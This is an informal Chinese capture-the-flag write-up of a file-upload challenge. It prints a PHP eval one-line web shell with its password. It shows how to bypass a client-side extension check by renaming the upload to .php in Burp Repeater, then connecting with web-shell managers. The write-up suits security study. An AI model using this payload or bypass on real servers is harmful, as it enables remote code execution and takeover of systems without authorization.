1:这是文件上传漏洞的简单题目,查看网页源代码发现这个
审计发现这是Java Script,对上传的文件格式进行了限制;
2:打开需要用到的工具,蚁* ,菜* 等等,坏了就再找一个,还有bp,我配合bp做的,没有的用这个<?php eval($_POST['a']); ?>,密码a.
3:上传一句话马后,抓到迫使特请求包,进行Repeater,将filename下的xxxxxx.jpg后缀改成php, rh就能成功连接了,右边Response的Upload success里面的有用
4:先拿一剑试试
连上了
5:彩刀再试试
也可以 找到